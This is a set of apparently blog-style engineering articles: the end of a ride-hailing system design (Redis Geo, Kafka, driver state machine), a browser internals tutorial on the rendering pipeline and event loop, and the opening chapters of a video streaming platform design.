Layer 1 — Write batching: Location Service buffers 500ms of updates and pipeline-writes to Redis in one round-trip. This reduces Redis round-trips 3–5x without increasing visible latency to the rider (500ms is imperceptible vs 1s update tick).

Layer 2 — Redis Geo sorted set: GEOADD overwrites the previous coordinate (O(log N) per write). GEORADIUS scans a bounding box (O(N+log M)). No locking. No transactions. This is why Redis Geo handles 1.67M concurrent writes while serving sub-10ms matching queries simultaneously.

Layer 3 — Kafka fan-out for ON_TRIP tracking:

State-adaptive update frequency — accuracy vs cost:

Driver state	Update frequency	Redis writes/sec at 5M drivers	Why this frequency
IDLE	Every 5s	1M writes/sec	No rider watching — coarse position enough for matching
RESERVED	Every 2s	2.5M writes/sec	Rider watching ETA countdown on map
ON_TRIP	Every 1s	5M writes/sec	Rider watching live position; smooth animation required

Sending 1-second updates from IDLE drivers wastes 60–70% of Redis write capacity for zero rider-visible benefit. The state machine already knows each driver's state — frequency is derived from it for free.

Stale location self-healing:

Driver phone disconnects -> WebSocket closes -> Location Svc detects
  -> EXPIRE driver:state:driver_id 30
  -> After 30s with no heartbeat: key expires -> auto-removed from idle pool
  -> No stale drivers offered to riders. No cron job needed.

markdown

[!IMPORTANT]
Fan-out via Kafka is a correctness requirement, not a performance optimization. Without it, location updates only reach the rider if they happen to be on the same server as the driver — never guaranteed in a distributed deployment.

[!NOTE]
Key Insight: Write path and read path never conflict in Redis Geo. Writes overwrite one sorted set entry (O(log N)). Reads scan a bounding box (O(N+log M)). No locking. This is why Redis Geo handles 1.67M concurrent writes while serving sub-10ms matching queries.

11. Bottlenecks & Scaling

What breaks first as scale grows 10x:

Bottleneck	Breaks at	Strategy
Redis location write throughput	~10M writes/sec	Shard by city/region: drivers:idle:bangalore, drivers:idle:mumbai. Each shard is an independent Redis cluster.
Match Service fan-out at surge	500K ride requests/sec	Horizontal scale (stateless service); partition ride requests by pickup geohash — each Match Service shard owns a set of cells.
PostgreSQL trip writes	~100K writes/sec per primary	Kafka consumers batch-insert trips (bulk insert 1000 rows vs 1 per event). Add read replicas for ride history queries.
WebSocket server connections	~100K connections per server	Sticky load balancing by driver_id hash; horizontal scale to 70+ servers for 7M connections.
Surge Calculator at 10x cities	Slow DB scan	Pre-aggregate demand counts per geohash cell using Kafka Streams (rolling 5-min window) — write results to Redis instead of scanning the full ride request DB.

Caching strategy:

Driver metadata (name, vehicle, rating): Redis cache TTL 5 minutes — reads on every matching request
Surge multiplier: Redis TTL 60s — Surge Calculator writes, Ride Service reads
Rate table (price/km): Redis TTL 1 hour — changes infrequently
Ride history: read replica + application-level pagination — no caching needed (user reads once)

CDN / Edge: Not applicable to the core matching path. Rider and driver apps download static assets (map tiles, app bundles) via CDN. Dynamic API calls and WebSockets must reach origin.

12. Failure Scenarios

Failure	Impact	Recovery
Redis primary fails (location + state)	Matching halts; active trips lose live map	Redis Sentinel / Cluster failover in < 30s. Drivers re-register within 15s via heartbeat. Active trips re-establish tracking via Kafka (reliable path unaffected).
Match Service instance crashes mid-assignment	Driver reserved but no offer sent; driver stuck in RESERVED	Redis TTL on driver:state expires in 30s → auto-reverts to IDLE. Rider request retries via Kafka dead-letter queue.
Kafka broker failure	Trip events delayed; live tracking fan-out delayed	Kafka cluster replication (RF=3); consumer lag; events replayed on broker recovery. No data loss.
PostgreSQL primary fails	Trip write fails; billing delayed	PostgreSQL replica promoted (RDS Multi-AZ: < 60s). Kafka retains events during failover — no billing data lost.
Driver app disconnects mid-trip	Location updates stop; rider map freezes	Rider shown "signal lost" UI. Driver reconnects and resumes. If no reconnect in 30s: TTL expires, trip marked as interrupted, ops notified.
Payment Service unavailable	Fare not charged at trip end	Kafka retains trip_end event. Payment Service processes on recovery. Idempotency key prevents double-charge.
Surge Calculator crash	Surge multiplier stale (60s TTL expiry)	Redis TTL expires → fallback to 1x. Surge Calculator restarts; resumes writing within seconds. Brief under-pricing acceptable.
Double-booking race condition	Two servers attempt to reserve the same driver	Redis WATCH/MULTI/EXEC: only one EXEC succeeds. Second server gets nil, skips driver, tries next candidate. Zero double-bookings.

13. Trade-offs

Geohash vs Quadtree for Driver Geospatial Index

Dimension	Geohash (Redis Geo)	Quadtree
Cell shape	Rectangle — uneven diagonal vs edge distance	Adaptive subdivision — cells match data density
Neighbor lookup	Must check up to 9 cells for edge cases	Clean tree traversal — 4 children per node
Write throughput	In-memory sorted set — 1.67M writes/sec	Tree rebalancing on write — slower at high write rates
Operational cost	Redis built-in GEORADIUS — zero extra infra	Custom service or library — additional complexity
Production use	Industry standard for most systems	Better for non-uniform density (dense city vs rural)

Chosen: Redis Geo (geohash) — already in the stack for driver state and locks. GEORADIUS is a single command. The trade-off I accept is rectangular cells with slight edge distortion, which is acceptable because we expand to adjacent cells on radius expansion and the distortion (< 5% area difference) does not materially affect ETA accuracy.

[!NOTE]
Key Insight: H3 hexagons (Uber's production choice) solve the corner-distance problem but require a custom indexing layer. For most systems, Redis GEORADIUS is the right default — zero extra infrastructure, built-in neighbor search, proven at scale.

WebSocket vs HTTP Polling for Live Tracking

Dimension	WebSocket	HTTP Polling
Connection overhead	Persistent — one TLS handshake, then frames	New HTTP request per update — TLS + headers each time
Write volume at 5M drivers	1.67M x 20B frames = 33 MB/s	1.67M x 2KB headers = 3.3 GB/s
Bidirectional	Yes — server pushes dispatch offer to driver	No — driver must poll for offers separately
Server state	Stateful sticky routing needed	Stateless — any server handles any request
Battery impact	Low — persistent connection	High — repeated TLS handshakes

Chosen: WebSocket — at 5M drivers updating every 3 seconds, HTTP header overhead alone generates 3.3 GB/s of wasted bytes. WebSocket frames are ~20 bytes. The trade-off I accept is stateful sticky routing (drivers must reconnect to the same server region), which is acceptable because the Location Service is partitioned by city and drivers rarely cross region boundaries mid-shift.

[!NOTE]
Key Insight: WebSocket vs HTTP is a math problem. 5M drivers x 1 update/3s x 2KB HTTP overhead = 3.3 GB/s in headers alone. WebSocket frames are ~20 bytes. The transport choice is arithmetic, not preference.

Surge Pricing Consistency — Eventual vs Strong

Dimension	Strong consistency (read-your-writes)	Eventual consistency (Redis TTL 60s)
Accuracy	Multiplier always reflects latest demand	Up to 60s stale
Latency impact	Must read from DB or leader on every fare call	Redis sub-ms read
Complexity	Distributed transaction across Surge Calc + Ride Svc	Fire-and-forget write to Redis; Ride Svc reads independently
Rider impact	Price always reflects current demand	Rider may see slightly outdated price

Chosen: Eventual consistency with 60s TTL. The fare shown at request time is the fare charged (contractual). A 60-second staleness window does not materially harm riders or drivers. The strong-consistency alternative adds a synchronous DB read on every fare call — at 500K peak requests/sec this becomes a DB bottleneck.

[!NOTE]
Key Insight: Surge pricing staleness is a business tolerance decision, not a technical limitation. 60 seconds is enough granularity for a pricing signal. Exact real-time surge would require a synchronous distributed read on every fare request — the cost is not justified by the precision gained.

14. Interview Summary

[!TIP]
When the interviewer says "walk me through your Uber design," hit these points in order. Each is a decision with a clear WHY.

Key Decisions

Decision	Problem It Solves	Trade-off Accepted
WebSocket (not HTTP) for location	3.3 GB/s HTTP header waste at 5M drivers	Stateful sticky routing per city region
Redis Geo (not PostGIS) for live positions	1.67M location writes/sec; sub-ms spatial queries	Ephemeral — re-registers within 15s on crash
WATCH/MULTI/EXEC atomic state transition	Prevents double-booking without a separate lock service	30s TTL on RESERVED state — rare retry on server crash
Driver State Machine (IDLE/RESERVED/ON_TRIP)	Controls pool membership, update frequency, and crash recovery in one mechanism	State lives in Redis — not durable, but self-healing via TTL
Kafka for trip events (not direct DB write)	Decouples 300ms fast matching path from reliable billing write	5–20ms Kafka lag on durable writes — acceptable
ETA-based ranking (not distance)	Riders experience wait time, not map distance	Routing engine call for each top-K candidate — ~10ms per call
State-adaptive location frequency	60–70% Redis write reduction vs fixed 1s tick; no rider-visible degradation	Requires state machine to be the source of truth for update interval

Fast Path vs Reliable Path

Fast Path   (latency):   Driver WS -> Redis GEOADD -> GEORADIUS -> WATCH/EXEC -> WS push to driver
                         ON_TRIP tracking: Redis -> Kafka -> WS push to rider map

Reliable Path (safety):  trip_start / trip_end -> Kafka -> PostgreSQL (billing, history)
                         Fare request -> Ride Request DB -> Surge Calculator -> Redis

Location = fast path only (ephemeral, overwritten every 1-5s, TTL self-heals)
Trip record = reliable path (durable, drives billing and audit, never lost)

Key Insights Checklist

[!IMPORTANT]
These are the lines that make an interviewer lean forward. Know them cold.

"Matching is not about finding the nearest driver — it is about finding the fastest pickup." We rank by ETA, not distance. Distance is a proxy; ETA is the truth. Every system that ranks by distance is optimizing for the wrong metric.
"Consistency in driver assignment is enforced through state transitions, not locks." The atomic IDLE → RESERVED via WATCH/MULTI/EXEC is the mutual exclusion. No separate lock service. No ZooKeeper. The state is the truth.
"Location data is high-frequency and ephemeral — storing it in a DB creates write bottlenecks." Redis holds only the current position. TTL self-evicts stale data. The previous coordinate has zero value the moment the next one arrives.
"Update frequency is a function of driver state, not a single tuning knob." IDLE drivers waste 60–70% of Redis write capacity if pinged every second. The state machine already knows the state — frequency is derived from it for free.
"The Kafka queue is a correctness requirement." Decoupling fast matching (Redis, sub-100ms) from reliable billing (Kafka → DB) is what makes both guarantees achievable simultaneously. Without Kafka, a slow DB write would block the matching path.
"CAP per component." Rider-facing services are AP. Driver assignment is CP. The system is not uniformly one or the other — this is the right answer in an interview.

Browser Internals: A Senior Engineer's Deep Dive

Arghya Majumder — Sun, 11 Jan 2026 18:52:07 +0000

Browser Internals: A Senior Engineer's Deep Dive

Understanding how the browser works under the hood is essential for performance optimization and debugging.

1. The Browser Architecture

Modern browsers have a multi-process architecture:

┌─────────────────────────────────────────────────────────────┐
│                     Browser Process                          │
│  (UI, bookmarks, network, storage)                          │
└─────────────────────────────────────────────────────────────┘
         │              │              │              │
         ▼              ▼              ▼              ▼
┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│  Renderer   │ │  Renderer   │ │  Renderer   │ │    GPU      │
│  Process    │ │  Process    │ │  Process    │ │  Process    │
│  (Tab 1)    │ │  (Tab 2)    │ │  (Tab 3)    │ │             │
└─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘

Why Multiple Processes?

Benefit	Explanation
Security	Each tab is sandboxed; malicious site can't access other tabs
Stability	If one tab crashes, others survive
Performance	Parallel processing across CPU cores

2. The Rendering Pipeline (Critical Rendering Path)

This is the most important concept for frontend performance.

┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐
│   HTML   │───▶│   DOM    │───▶│  Render  │───▶│  Layout  │───▶│  Paint   │
│  Parse   │    │   Tree   │    │   Tree   │    │          │    │          │
└──────────┘    └──────────┘    └──────────┘    └──────────┘    └──────────┘
                     │                │
                     │                │
               ┌─────▼─────┐          │
               │   CSSOM   │──────────┘
               │   Tree    │
               └───────────┘

Step-by-Step Breakdown

1. HTML Parsing → DOM Tree

<html>
  <body>
    <div id="app">
      <p>Hello</p>
    </div>
  </body>
</html>

        document
            │
          html
            │
          body
            │
        div#app
            │
           p
            │
        "Hello"

Key Point: Parser is synchronous. When it hits <script>, it STOPS.

2. CSS Parsing → CSSOM Tree

body { font-size: 16px; }
#app { color: blue; }
p { margin: 10px; }

        CSSOM
          │
     ┌────┴────┐
   body      #app
(font:16)   (color:blue)
     │
     p
 (margin:10)

Key Point: CSSOM construction blocks rendering. This is why we inline critical CSS.

3. Render Tree (DOM + CSSOM)

Only visible elements are included:

Render Tree:
  body (font: 16px)
    └─ div#app (color: blue)
         └─ p (margin: 10px)
              └─ "Hello"

NOT included:
  - <head> and its children
  - Elements with display: none
  - <script>, <meta>, <link>

4. Layout (Reflow)

Calculates the exact position and size of each element:

┌────────────────────────────────────────┐
│ body: 0,0 - 1920x1080                  │
│  ┌──────────────────────────────────┐  │
│  │ div#app: 8,8 - 1904x500          │  │
│  │  ┌────────────────────────────┐  │  │
│  │  │ p: 8,18 - 1904x20          │  │  │
│  │  └────────────────────────────┘  │  │
│  └──────────────────────────────────┘  │
└────────────────────────────────────────┘

Expensive Operation: Changing width, height, position triggers reflow of all descendants.

5. Paint

Fills in pixels: colors, borders, shadows, text.

Paint Order:

Background color
Background image
Border
Children
Outline

6. Composite

GPU combines layers into final image. Elements on separate layers can animate without repaint.

3. The Event Loop: JavaScript's Heartbeat

JavaScript is single-threaded. The Event Loop is how it handles async operations.

The Mental Model

┌─────────────────────────────────────────────────────────────┐
│                         HEAP                                 │
│                   (Object Storage)                           │
└─────────────────────────────────────────────────────────────┘

┌─────────────┐     ┌─────────────────────────────────────────┐
│   CALL      │     │              WEB APIs                    │
│   STACK     │     │  (setTimeout, fetch, DOM events, etc.)  │
│             │     └──────────────────┬──────────────────────┘
│  function() │                        │
│  function() │                        ▼
│  main()     │     ┌─────────────────────────────────────────┐
└─────────────┘     │           CALLBACK QUEUES                │
       ▲            │  ┌─────────────────────────────────────┐ │
       │            │  │ Microtask Queue (Promises, queueMT) │ │
       │            │  └─────────────────────────────────────┘ │
       │            │  ┌─────────────────────────────────────┐ │
       └────────────│  │ Macrotask Queue (setTimeout, I/O)   │ │
     Event Loop     │  └─────────────────────────────────────┘ │
     picks next     └─────────────────────────────────────────┘

Execution Order

console.log('1');  // Sync

setTimeout(() => console.log('2'), 0);  // Macrotask

Promise.resolve().then(() => console.log('3'));  // Microtask

console.log('4');  // Sync

// Output: 1, 4, 3, 2

The Rule:

Execute all synchronous code (Call Stack empties)
Execute ALL microtasks (Promise callbacks, queueMicrotask)
Execute ONE macrotask (setTimeout, setInterval, I/O)
Repeat from step 2

Microtasks vs Macrotasks

Microtasks	Macrotasks
`Promise.then/catch/finally`	`setTimeout`
`queueMicrotask()`	`setInterval`
`MutationObserver`	`setImmediate` (Node)
`process.nextTick` (Node)	I/O callbacks
	`requestAnimationFrame`*

*requestAnimationFrame runs before repaint, after microtasks.

The Danger: Blocking the Event Loop

// BAD: Blocks for 5 seconds
function processLargeArray(items) {
  items.forEach(item => {
    // Heavy computation
    heavyWork(item);
  });
}

// GOOD: Yield to the event loop
async function processLargeArray(items) {
  for (const item of items) {
    heavyWork(item);

    // Let browser breathe every 100 items
    if (index % 100 === 0) {
      await new Promise(r => setTimeout(r, 0));
    }
  }
}

4. Reflow vs Repaint

Understanding what triggers each is crucial for performance.

Repaint (Cheap)

Changes to visual properties that don't affect layout:

element.style.color = 'red';
element.style.backgroundColor = 'blue';
element.style.visibility = 'hidden';  // Still takes space
element.style.opacity = 0.5;

Reflow (Expensive)

Changes to geometry trigger layout recalculation:

element.style.width = '100px';
element.style.height = '200px';
element.style.padding = '10px';
element.style.margin = '20px';
element.style.display = 'none';  // Removed from layout
element.style.position = 'absolute';
element.style.fontSize = '20px';  // Text reflow!

Layout Thrashing

The worst performance anti-pattern:

// BAD: Forces 100 reflows!
elements.forEach(el => {
  const height = el.offsetHeight;  // READ → forces layout
  el.style.height = height + 10 + 'px';  // WRITE → invalidates layout
});

// GOOD: Batch reads, then batch writes
const heights = elements.map(el => el.offsetHeight);  // All reads

elements.forEach((el, i) => {
  el.style.height = heights[i] + 10 + 'px';  // All writes
});

Properties That Trigger Layout

Reading these forces an immediate reflow:

// These are "layout-triggering" getters
element.offsetTop / offsetLeft / offsetWidth / offsetHeight
element.scrollTop / scrollLeft / scrollWidth / scrollHeight
element.clientTop / clientLeft / clientWidth / clientHeight
element.getBoundingClientRect()
window.getComputedStyle(element)

5. Compositor Layers

The GPU can animate certain properties without reflow or repaint.

Properties Handled by Compositor

/* These animate on the GPU — 60fps guaranteed */
transform: translateX(100px);
transform: scale(1.5);
transform: rotate(45deg);
opacity: 0.5;

How to Promote to Own Layer

/* Modern way */
.animated-element {
  will-change: transform;
}

/* Legacy fallback */
.animated-element {
  transform: translateZ(0);  /* "Null transform hack" */
}

The Layer Explosion Problem

/* BAD: Creates too many layers */
* {
  will-change: transform;
}

/* GOOD: Only elements that will animate */
.card:hover {
  will-change: transform;
}
.card {
  will-change: auto;  /* Release after animation */
}

6. requestAnimationFrame: The Right Way to Animate

Why Not setTimeout?

// BAD: Timer doesn't sync with display refresh
setInterval(() => {
  element.style.left = x++ + 'px';
}, 16);  // Hoping for 60fps

// GOOD: Synced with browser's paint cycle
function animate() {
  element.style.left = x++ + 'px';
  requestAnimationFrame(animate);
}
requestAnimationFrame(animate);

When rAF Fires

┌────────────────────────────────────────────────────────────┐
│                    One Frame (~16.67ms)                     │
├──────────┬──────────┬──────────┬──────────┬───────────────┤
│   JS     │   rAF    │  Style   │  Layout  │     Paint     │
│ (events) │callbacks │  Calc    │          │   Composite   │
└──────────┴──────────┴──────────┴──────────┴───────────────┘

7. Web Workers: True Parallelism

For heavy computation that would block the main thread:

// main.js
const worker = new Worker('worker.js');

worker.postMessage({ data: largeArray });

worker.onmessage = (event) => {
  console.log('Result:', event.data);
};

// worker.js
self.onmessage = (event) => {
  const result = heavyComputation(event.data);
  self.postMessage(result);
};

Limitations

Can Access	Cannot Access
`fetch`	DOM
`setTimeout/setInterval`	`window`
`WebSockets`	`document`
`IndexedDB`	UI-related APIs
`postMessage`	`localStorage` (use IndexedDB)

8. Memory Management & Garbage Collection

How GC Works (Mark and Sweep)

1. Mark Phase: Start from "roots" (global, stack), mark all reachable objects
2. Sweep Phase: Delete all unmarked objects

Common Memory Leaks

// 1. Forgotten event listeners
element.addEventListener('click', handler);
// element removed from DOM, but handler still references it

// 2. Closures holding references
function createHandler() {
  const largeData = new Array(1000000);
  return () => console.log(largeData.length);
}

// 3. Detached DOM trees
const div = document.createElement('div');
div.innerHTML = '<span>Hello</span>';
// div never added to DOM, but JavaScript holds reference

Detecting Leaks

// Chrome DevTools → Memory → Take Heap Snapshot
// Compare snapshots before and after suspected leak

9. Interview Tip

"I understand the browser as a multi-stage pipeline: parsing HTML/CSS into trees, combining them into the render tree, calculating layout, painting pixels, and compositing layers. I optimize by avoiding layout thrashing (batch reads before writes), using compositor-friendly properties (transform, opacity) for animations, and leveraging requestAnimationFrame for smooth 60fps. For heavy computation, I use Web Workers to keep the main thread responsive. Understanding the event loop — especially the microtask/macrotask distinction — helps me write predictable async code."

Video Streaming Platform (YouTube / Hotstar / Netflix / Prime) High-level System Design

Arghya Majumder — Sun, 11 Jan 2026 18:07:28 +0000

Video Streaming Platform (YouTube / Netflix / Hotstar)

Chapter 1 — Product Requirements, Scale, and Design Targets

This chapter defines what kind of video platform we are building and the physical limits it must survive.

Everything that follows in this book is constrained by these numbers.

We are designing a global video streaming platform in the class of YouTube, Netflix, and Amazon Prime Video that supports:

User-generated uploads
Studio-grade content
On-demand playback
Live streaming
Offline viewing
Multi-device continuity

The system must feel instant, reliable, and smooth for hundreds of millions of users.

1. Functional Requirements

The platform must support the following core user actions:

Content creators

Upload raw video files of arbitrary length and size
See upload progress and failure recovery
Have videos transcoded into multiple qualities
Publish videos to be watchable by viewers

Viewers

Discover and open a video
Start playback in under 2 seconds
Seek, pause, and change quality without visible glitches
Continue watching the same video on another device
Download videos for offline playback
Watch live streams with minimal delay

Platform

Track watch time, views, and engagement
Recommend content
Enforce regional, subscription, and DRM rules
Protect against piracy and abuse

2. Non-Functional Requirements

These are the invisible constraints that shape the architecture.

Latency

Time-to-first-frame: < 2 seconds for most users
Seek latency: < 500 ms
Live stream delay: < 5 seconds from broadcaster to viewer

Reliability

A CDN edge failure must not stop playback
Analytics outages must not stop playback
Backend outages should only block new playback starts, not active streams

Consistency

Resume position can be eventually consistent
View counts can be delayed
DRM enforcement must be strongly consistent

Scalability

Must support global viral traffic spikes
One video can be watched by tens of millions simultaneously

3. Traffic Model

We design for a YouTube-scale service.

Users

300 million daily active users
50 million concurrent viewers at peak

Playback

Average session: 30 minutes
Average bitrate: 3 Mbps
Peak bitrate: 15–25 Mbps (4K)

This means peak outbound traffic can exceed:

50M users × 3 Mbps = 150 Tbps

This immediately tells us:
No backend service can ever sit in the video data path.
Only CDNs can handle this scale.

4. Upload Model

Creators upload far fewer videos than viewers watch.

10 million uploads per day
Average file size: 1–3 GB
Peak upload throughput: ~500 Gbps globally

Uploads are heavy but not latency-sensitive.
They can be queued, retried, and processed asynchronously.

5. Storage Model

We store multiple versions of every video.

If a 1-hour video is transcoded into:

4K
1080p
720p
480p
360p

And segmented into 4-second chunks, a single video produces thousands of objects.

At YouTube scale:

Exabytes of cold storage
Petabytes of hot CDN cache

This forces us to use:

Cheap object storage (S3-like)
Aggressive CDN caching
Versioned immutable files

6. Design Targets

These numbers lock in the architecture.

Constraint	Consequence
150+ Tbps video traffic	Video must flow only through CDNs
Millions of concurrent users	Backend must be stateless & horizontally scalable
Billions of video segments	Storage must be object-based, not filesystem-based
UI must never freeze	Player must run off the main thread
Analytics can lag	Events must be async via Kafka-style logs

These constraints will force:

A two-plane architecture (control vs data)
A frontend-driven control loop
A CDN-first delivery model

End of Chapter 1.

Chapter 2 — Global Platform Architecture

This chapter defines the full system at 30,000 feet before we dive into any single pipeline.
Every service, database, CDN, and client lives inside this picture.

The most important idea is this:

Video bytes and playback control must never flow through the same systems.

This is the single architectural rule that allows the platform to scale to hundreds of millions of users.

1. The Two-Plane Architecture

The platform is split into two planes:

Control Plane

Handles:
- Authentication
- Authorization
- Metadata
- Manifests
- DRM
- Analytics events
Data Plane

Handles:
- Video bytes
- Audio bytes
- Subtitle bytes
- Segment delivery

The control plane is backend-heavy.

The data plane is CDN-heavy.

2. High-Level System Diagram

┌─────────────────────────────────────────────────────────────────────────┐
│                            CLIENT LAYER                                  │
│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐                  │
│  │   Web App    │  │  Mobile App  │  │   Smart TV   │                  │
│  │  (React/Vue) │  │ (iOS/Android)│  │     App      │                  │
│  └──────┬───────┘  └──────┬───────┘  └──────┬───────┘                  │
└─────────┼──────────────────┼──────────────────┼──────────────────────────┘
          │                  │                  │
          └──────────────────┼──────────────────┘
                             │
                    ┌────────▼────────┐
                    │   API Gateway   │
                    │  (Rate Limiting,│
                    │   Auth, Routing)│
                    └────────┬────────┘
                             │
          ┌──────────────────┼──────────────────┐
          │                  │                  │
   ┌──────▼──────┐    ┌─────▼──────┐    ┌─────▼──────┐
   │   Video     │    │  Metadata  │    │   User     │
   │  Upload     │    │  Service   │    │  Service   │
   │  Service    │    │            │    │            │
   └──────┬──────┘    └─────┬──────┘    └─────┬──────┘
          │                 │                  │
          │                 │                  │
   ┌──────▼──────┐    ┌─────▼──────┐    ┌─────▼──────┐
   │  Transcode  │    │  Comment   │    │ Recommend. │
   │   Service   │    │  Service   │    │  Service   │
   │  (Queue)    │    │            │    │   (ML)     │
   └──────┬──────┘    └─────┬──────┘    └─────┬──────┘
          │                 │                  │
          │                 │                  │
┌─────────▼─────────────────▼──────────────────▼─────────────┐
│                     DATA LAYER                              │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐  │
│  │   SQL    │  │  NoSQL   │  │  Object  │  │  Cache   │  │
│  │   (RDS)  │  │(Cassandra│  │ Storage  │  │ (Redis)  │  │
│  │          │  │/DynamoDB)│  │   (S3)   │  │          │  │
│  └──────────┘  └──────────┘  └──────────┘  └──────────┘  │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│                    CDN LAYER                                 │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐  │
│  │  CDN Edge│  │  CDN Edge│  │  CDN Edge│  │  CDN Edge│  │
│  │   (US)   │  │   (EU)   │  │  (APAC)  │  │  (Others)│  │
│  └──────────┘  └──────────┘  └──────────┘  └──────────┘  │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│                  BACKGROUND JOBS                             │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐  │
│  │Thumbnail │  │  View    │  │Analytics │  │  CDN     │  │
│  │Generator │  │ Counter  │  │Processor │  │ Warmer   │  │
│  └──────────┘  └──────────┘  └──────────┘  └──────────┘  │
└─────────────────────────────────────────────────────────────┘

The backend never streams video.

It only gives the client permission and coordinates where to get it.

3. Why This Architecture Exists

If even 1% of video traffic hit the backend:

150 Tbps × 1% = 1.5 Tbps

No database, API layer, or VPC can survive that.

So:

Backend gives URLs
CDN gives bytes

This separation makes:

Video cheap
Latency low
Scaling trivial

4. Where the Frontend Fits

The frontend is not “just a UI”.
It is the playback brain.

It decides:

Which quality to use
When to prefetch
When to pause
When to seek
When to retry

The backend only provides:

The map (manifest)
The rules (DRM, region, quality caps)

This makes the platform:

Highly available
Resistant to partial failures
Cheap to operate

5. Failure Boundaries

This architecture enforces strong blast-radius isolation.

If this fails:

Component	What breaks
CDN edge	Player switches to another edge
Metadata DB	New playback may fail
Analytics	No metrics, playback continues
Kafka	Data piles up, playback continues

Playback is protected by design.

End of Chapter 2.

Chapter 3 — The Ingestion & Transcoding Pipeline (Merged Logic)

To handle millions of hours of uploads globally, the system must treat ingestion as an asynchronous, fault-tolerant factory.

3.1 Resumable Upload Flow

We avoid simple POST requests for large files. Instead, the Frontend utilizes the TUS Protocol or S3 Multipart Upload to ensure reliability.

Handshake: The Client requests a unique videoId and a pre-signed uploadUrl from the Upload Service.
Chunking: The Frontend Client breaks the video file into small, equal-sized chunks (e.g., 5MB each).
Transmission: Chunks are sent sequentially or in parallel with a checksum. If the connection drops, the client queries the server for the last successful byte offset and resumes.

3.2 Transcoding & Processing (The "Refinery")

Once the raw file is stored in Object Storage (S3), an event triggers the Transcoding Service.

The Transcoding Workflow:

Job Orchestration: A Message Queue (Kafka/SQS) holds transcoding tasks to decouple the upload from processing.
Parallel Workers: Distributed workers (using FFmpeg) pick up jobs to generate the Quality Ladder:
- Resolutions: 4K (2160p), 1080p, 720p, 480p, 360p, 240p.
- Codecs: H.264 (Compatibility), H.265/VP9 (Efficiency).
Segmenting: The workers break each version into 5-10 second segments (.ts or .m4s files) and generate the HLS/DASH Manifests (.m3u8 or .mpd).

3.3 Ancillary Background Jobs:

Thumbnail Generation: Extracting keyframes at specific intervals to generate "Preview Sprites" for the frontend seek-bar.
Content Moderation: Running ML models to scan for spam, copyright violations, or prohibited content.
CDN Warming: Proactively pushing the newly created manifest and initial segments to edge caches in regions where the creator has a high following.

3.4 Ingestion Architecture (ASCII)

┌─────────┐      ┌────────────────┐      ┌──────────────┐      ┌───────────────┐
│ Creator │ ───> │ Upload Service │ ───> │ Raw S3 Bucket│ ───> │ Message Queue │
└─────────┘      └────────────────┘      └──────────────┘      └───────┬───────┘
                                                                       │
┌───────────────┐      ┌──────────────┐      ┌─────────────────┐       │
│ Metadata DB   │ <─── │ Storage (CDN)│ <─── │ Transcode Worker│ <─────┘
└───────────────┘      └──────────────┘      └─────────────────┘

End of Chapter 3

Chapter 4 — The Frontend Player Engine & ABR Logic (The "Spine" Core)

This chapter addresses the "Brain" of the system: the Client-Side Player. We treat the player not as a UI component, but as a resource orchestrator that manages the hardware-software bridge.

4.1 Architecture of a Production-Grade Player

To prevent UI jank, we separate the playback logic from the rendering thread.

The Controller: Coordinates between the UI, the network, and the hardware buffer.
The Buffering Engine (MSE): Utilizes Media Source Extensions (MSE) to feed binary video segments into the browser's <video> tag.
The Decryption Module (EME): Handles Encrypted Media Extensions (EME) for DRM-protected content (Widevine/FairPlay).

4.2 Adaptive Bitrate (ABR) Heuristics

The player must decide which quality to download next without human intervention. We use a Hybrid Algorithm:

Throughput-Based: Measures the download speed of the last few segments.
Buffer-Based (BBA): Measures how many seconds of video are currently stored in RAM.
- Safe Zone (30s+): Stay at High Quality.
- Danger Zone (<10s): Aggressively switch to Low Quality to avoid a "Spinner."

4.3 Handling the "Thin Client" vs. "Thick Client"

Staff engineers must account for hardware diversity.

Feature	Thick Client (Desktop/PS5)	Thin Client (2018 Smart TV)
Logic	Runs full ABR heuristics locally.	Server dictates the bitrate.
Threading	Uses Web Workers for parsing.	Single-threaded, synchronous.
Buffering	Large 60s forward buffer.	Minimal 5-8s buffer to avoid RAM crash.

4.4 The Internal Player State Machine

The player does not just "Play" or "Pause." It transitions through complex states:

IDLE: Resource allocation.
LOADING: Fetching the Master Manifest (.m3u8).
STALLED: Buffer empty; UI shows "spinner," ABR shifts to lowest bitrate.
SEEKING: Clearing the current buffer and performing a "Cold Start" at the new timestamp.

4.5 Performance Optimization: The "Zero-Latency" Goal

VTT (Video Thumbnails): Fetching a single "Sprite Sheet" image for the seek-bar rather than individual frames.
Pre-fetching: Using <link rel="prefetch"> for the first 3 segments of the "Next Video" in a playlist.
Request Interleaving: Prioritizing the video chunk download over secondary metadata (like comments or likes) on slow networks.


    [ UI: React ] <--- (Events) --- [ Player State Manager ]
                                           ^
                                           |
    [ Adaptive Bitrate Logic ] <---> [ Segment Downloader ]
                                           |
    [ Media Source Extensions ] <----------+
             |
             v
    [ Hardware Decoder ] --> [ Screen ]

End of Chapter 4

Chapter 5 — Metadata DB, Schema, and Discovery (Merged Logic)

While the video bytes live on the CDN, the Metadata Plane handles the "Brain" of the platform: users, subscriptions, and video details. This chapter merges the SQL/NoSQL strategy from the Backend Doc with the Discovery requirements of the Frontend Spine.

5.1 The Data Modeling Strategy

We use a polyglot persistence model to balance Acid Transactions (for ownership) with High Availability (for views/likes).

Primary Database (PostgreSQL/Spanner)

Users Table: userId, email, channelName, subscriptionLevel.
Videos Table: videoId, creatorId, title, description, manifestUrl, thumbnailUrL, status (Processing/Live/Private).
Subscriptions: (followerId, creatorId) with composite unique index.

High-Frequency Metadata (Cassandra/BigTable)

View Counts & Likes: These require massive write-throughput. We use an Eventual Consistency model where counts are buffered in Redis and flushed to Cassandra.
Comments: Stored as a partitioned wide-column store by videoId.

5.2 Discovery & Search Architecture

The Frontend "Home Feed" and "Search Bar" are powered by a specialized indexing layer.

Search Index (Elasticsearch/OpenSearch):
- Whenever a video is transcoded, the Metadata Service pushes a document to Elasticsearch.
- Insight: We use "Fuzzy Matching" and "Autocomplete" to handle typos in the frontend search bar.
